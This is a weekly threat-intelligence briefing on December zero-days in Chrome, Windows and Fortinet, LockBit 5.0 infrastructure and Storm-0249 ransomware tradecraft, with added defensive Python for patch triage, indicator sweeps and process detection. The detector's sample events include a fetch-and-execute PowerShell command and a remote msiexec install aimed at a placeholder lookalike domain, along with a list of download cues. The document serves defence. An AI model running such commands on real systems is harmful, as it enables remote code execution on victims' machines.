Cyber Security Weekly Briefing, 6-12 December
Google fixes actively exploited 0-day vulnerability in LibANGLE
Google has released emergency updates for Chrome that mitigate a high-severity zero-day vulnerability in the LibANGLE library, identified as a buffer overflow in the Metal renderer due to incorrect memory sizing.
The flaw allows memory corruption, information leaks, and potential arbitrary code execution. The fix is available in version 143.0.7499.x for Windows, macOS, and Linux, although its global rollout may be delayed. The vendor is keeping details restricted until most users apply the patch.
This incident brings the number of 0-day vulnerabilities exploited and fixed by Google in 2025 to eight, including previous flaws in V8, sandbox escape mechanisms, and exploits used in espionage and account hijacking operations. It is recommended to check for and apply the Chrome update immediately.
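A way to act on that recommendation at fleet scale, as an added example that is not part of the briefing or of any Google tooling: parse the reported Chrome versions from an inventory and flag hosts that are still below the fixed build. The fixed version string is the one given above; the host inventory is constructed for illustration.

```python
"""Triage a Chrome inventory against the fixed LibANGLE version.

Added example (not from the briefing or Google); the host list below is
constructed for illustration.
"""

# Fixed version as stated in the briefing. The trailing ".x" means any build
# on the 143.0.7499 branch counts as patched.
FIXED_VERSION = "143.0.7499.x"

# Constructed inventory: (hostname, reported Chrome version, platform)
INVENTORY = [
    ("ws-001", "143.0.7499.40", "windows"),
    ("ws-002", "142.0.7444.175", "windows"),
    ("mac-007", "143.0.7400.3", "macos"),
    ("lx-010", "144.0.7510.1", "linux"),
    ("ws-003", "143.0.7499", "windows"),
]


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '143.0.7499.40' into (143, 0, 7499, 40).

    An 'x' component (wildcard) ends the tuple, so '143.0.7499.x' becomes
    (143, 0, 7499) and compares on the first three fields only.
    """
    components = []
    for part in text.strip().split("."):
        if part.lower() == "x":
            break
        if not part.isdigit():
            raise ValueError(f"unexpected version component {part!r} in {text!r}")
        components.append(int(part))
    if not components:
        raise ValueError(f"empty version string {text!r}")
    return tuple(components)


def is_patched(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is at or above the fixed version.

    Only as many fields as the fixed version specifies are compared, so the
    wildcard build number is honoured. An installed version with fewer fields
    than the fixed one compares as lower (tuple ordering), which errs on the
    side of flagging the host.
    """
    inst = parse_version(installed)
    fix = parse_version(fixed)
    return inst[: len(fix)] >= fix


def hosts_needing_update(inventory=INVENTORY) -> list[str]:
    """Return hostnames whose Chrome build predates the fix."""
    return [host for host, version, _platform in inventory if not is_patched(version)]


if __name__ == "__main__":
    for host in hosts_needing_update():
        print(f"{host}: update Chrome to {FIXED_VERSION} or later")
```

Because the vendor notes that the rollout may be staggered, a host reporting an older build is not necessarily misconfigured; the list is a work queue for a manual "check for updates", not proof of compromise.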
Microsoft security update fixes 57 vulnerabilities, including three zero-days
Microsoft has released its December 2025 Patch Tuesday update, fixing 57 vulnerabilities, including one actively exploited zero-day and two publicly disclosed flaws. The batch includes 28 privilege escalation flaws, 19 remote code execution flaws, four information disclosure flaws, three denial of service flaws, and two spoofing flaws.
The exploited 0-day, CVE-2025-62221 (CVSSv3 7.8 according to the manufacturer), affects the Windows Cloud Files Mini Filter Driver and allows local elevation to SYSTEM privileges through a use-after-free. The publicly disclosed vulnerabilities include CVE-2025-64671 (CVSSv3 8.4 according to the manufacturer), which enables local command execution in Copilot for JetBrains by injecting commands through untrusted files or MCP servers, and CVE-2025-54100 (CVSSv3 7.8 according to the manufacturer), a flaw in PowerShell that allows code to be executed when Invoke-WebRequest processes malicious web content.
Microsoft has incorporated additional measures, such as security warnings when using Invoke-WebRequest, and attributes the discoveries to multiple external researchers and internal security teams.
LockBit 5.0 operational infrastructure exposure
Researcher Rakesh Krishnan has identified LockBit 5.0's key infrastructure, linking IP address 205.185.116.233 and domain karma0.xyz to its most recent leak site. The server, hosted on AS53667 (PONYNET/FranTech), displays a DDoS protection page labeled "LOCKBITS.5.0," confirming its operational function.
The domain, registered on April 12, 2025, with Namecheap privacy and Cloudflare DNS, maintains clientTransferProhibited status, indicating control retention measures. Host scans reveal multiple exposed services, including FTP (21), HTTP (80/5000/47001), WinRM (5985), a file server (49666), and, notably, RDP on port 3389, considered a critical vector for unauthorized remote access.
This exposure coincides with the resurgence of LockBit 5.0, which adds support for Windows, Linux, and ESXi, randomized file extensions, geographic evasion, and faster encryption using XChaCha20. The exposure confirms recurring OPSEC deficiencies in the group. It is recommended to block the domain and IP immediately and to monitor for associated activity.
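One way to carry out the blocking and monitoring recommendation, as an added example that is not part of the briefing or of the researcher's own tooling: sweep DNS and firewall logs for the two indicators named above. The IP and domain are the ones in the briefing; the log lines are constructed for illustration. The matcher treats a domain hit as an exact match or a subdomain, never a bare substring, and anchors the IP on word boundaries, so look-alike values do not produce false positives.

```python
"""Sweep DNS and firewall log lines for the LockBit 5.0 indicators above.

Added example (not from the briefing or the researcher's own tooling). The
indicators are the IP and domain named in the briefing; the log lines are
constructed for illustration.
"""
import re

# Indicators from the briefing
IOC_IPS = {"205.185.116.233"}
IOC_DOMAINS = {"karma0.xyz"}

# Constructed sample log lines (DNS resolver and perimeter firewall)
SAMPLE_LOG = [
    "2025-12-10T08:14:02Z dns client=10.20.1.15 query=www.karma0.xyz type=A",
    "2025-12-10T08:14:03Z fw action=allow src=10.20.1.15 dst=205.185.116.233 dport=443",
    "2025-12-10T08:15:11Z dns client=10.20.1.22 query=updates.example.com type=A",
    "2025-12-10T08:16:40Z fw action=allow src=10.20.1.22 dst=205.185.116.2 dport=443",
    "2025-12-10T08:17:05Z dns client=10.20.1.30 query=karma0.xyz.cdn.example.net type=A",
]

# Dotted quad bounded by word boundaries, so 205.185.116.2330 is not a hit
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Hostnames: dot-separated labels ending in an alphabetic top-level label
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def domain_matches(name: str, iocs: set[str]) -> bool:
    """Exact match or subdomain of an indicator; never a substring match,
    so karma0.xyz.cdn.example.net is not treated as a hit."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in iocs)


def scan_log(lines) -> list[tuple[int, str, str]]:
    """Return (line number, indicator type, matched value) for every hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((lineno, "ip", ip))
        for host in DOMAIN_RE.findall(line):
            if domain_matches(host, IOC_DOMAINS):
                hits.append((lineno, "domain", host.lower()))
    return hits


if __name__ == "__main__":
    for lineno, kind, value in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {kind} indicator {value}")
```

A hit on the resolver log (line 1 in the sample) is worth more than a hit on the firewall log, since DNS resolution of the leak-site domain from an internal client points at the host that needs triage, whereas the IP alone may be shared with unrelated tenants on the same hosting provider.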
Storm-0249 adopts advanced tactics to facilitate ransomware operations
ReliaQuest has identified a tactical shift in Storm-0249, an actor that originally operated as an initial access broker, toward stealthier techniques aimed at preparing intrusions for ransomware affiliates.
The group employs domain spoofing, DLL sideloading, and fileless PowerShell execution, including the ClickFix tactic, which tricks victims into pasting and executing malicious commands through the Windows Run dialog.
The procedure downloads a script from a domain that mimics Microsoft and executes an MSI with SYSTEM privileges, which deploys a trojanized SentinelOne DLL for subsequent sideloading. Running under legitimate processes, the actor invokes native utilities such as reg.exe and findstr.exe to extract identifiers such as MachineGuid, which families such as LockBit and ALPHV use to tie encryption keys to specific systems.
The use of living-off-the-land techniques and signed processes reduces detectability and evidences a shift from mass campaigns to precision attacks aimed at facilitating ransomware operations.
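Living-off-the-land activity is hard to catch on file hashes but leaves a recognisable shape in process-creation telemetry. As an added example that is not from ReliaQuest's report or any product's rule set, the following rules flag the three behaviours described above over constructed Sysmon-style events (parent image, image, command line): PowerShell launched from the Run dialog that fetches remote content, msiexec installing a package from a URL, and reg.exe or findstr.exe touching MachineGuid. Assumptions, also noted in the code: a command entered in the Run dialog is spawned by explorer.exe, MachineGuid is stored under HKLM\SOFTWARE\Microsoft\Cryptography, and the spoofed domain is a placeholder.

```python
r"""Flag the Storm-0249 tradecraft described above in process-creation events.

Added example, not from ReliaQuest's report or any product's rule set. The
events are constructed (Sysmon-style ParentImage / Image / CommandLine
fields); the spoofed domain is a placeholder. Assumptions: a command entered
in the Run dialog is spawned by explorer.exe, and MachineGuid lives under
HKLM\SOFTWARE\Microsoft\Cryptography.
"""
import re

# Constructed sample events (ids 1-3 are the described tradecraft, 4-5 are benign)
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://microsoft-update.example.invalid/s.ps1 | iex"'},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://microsoft-update.example.invalid/pkg.msi /qn"},
    {"id": 3, "parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
    {"id": 5, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Coarse substring cues for remote content retrieval; a first-pass filter,
# tune against your own baseline before alerting on it.
DOWNLOAD_CUES = ("iwr", "invoke-webrequest", "downloadstring",
                 "invoke-expression", "iex", "http")
# msiexec /i pointed at a URL rather than a local package
REMOTE_MSI_RE = re.compile(r"/i\s+https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_powershell(ev: dict) -> bool:
    """PowerShell spawned by explorer.exe (Run dialog) that pulls remote content."""
    cmd = ev["cmdline"].lower()
    return (basename(ev["parent"]) == "explorer.exe"
            and basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and any(cue in cmd for cue in DOWNLOAD_CUES))


def remote_msi_install(ev: dict) -> bool:
    """msiexec installing a package fetched over HTTP(S)."""
    return (basename(ev["image"]) == "msiexec.exe"
            and REMOTE_MSI_RE.search(ev["cmdline"]) is not None)


def machineguid_lookup(ev: dict) -> bool:
    """reg.exe or findstr.exe reading the MachineGuid value."""
    return (basename(ev["image"]) in ("reg.exe", "findstr.exe")
            and "machineguid" in ev["cmdline"].lower())


RULES = [
    ("clickfix_powershell", clickfix_powershell),
    ("remote_msi_install", remote_msi_install),
    ("machineguid_lookup", machineguid_lookup),
]


def detect(events) -> list[tuple[int, str]]:
    """Return (event id, rule name) for every rule that fires."""
    return [(ev["id"], name) for ev in events for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for event_id, rule_name in detect(EVENTS):
        print(f"event {event_id}: {rule_name}")
```

Event 4 shows why the parent-process condition alone is not enough: a scheduled script launched from the desktop also has explorer.exe as parent, and it is the remote-fetch cue that separates it from the ClickFix pattern. The MachineGuid rule is the highest-signal of the three, since ordinary administration rarely reads that value from the command line.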
Fortinet fixes flaws that compromise authentication and credential management
Fortinet released security patches to fix two critical vulnerabilities affecting FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager. Identified as CVE-2025-59718 and CVE-2025-59719 (CVSSv3 9.8 according to the manufacturer), both vulnerabilities allow FortiCloud SSO authentication to be bypassed using manipulated SAML messages due to weak cryptographic validation.
Although the FortiCloud SSO feature is not enabled by default, it is automatically enabled when the device registers with FortiCare, unless the administrator manually disables the corresponding option. Fortinet recommends temporarily disabling SSO login to FortiCloud until the security patches are applied.
In addition, the company fixed other vulnerabilities: CVE-2025-59808 (CVSSv3 6.8 according to Fortinet), which allows passwords to be reset without requesting the current password if an attacker has already accessed the account, and CVE-2025-64471 (CVSSv3 7.5), which makes it possible to authenticate using a hash instead of a password.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us.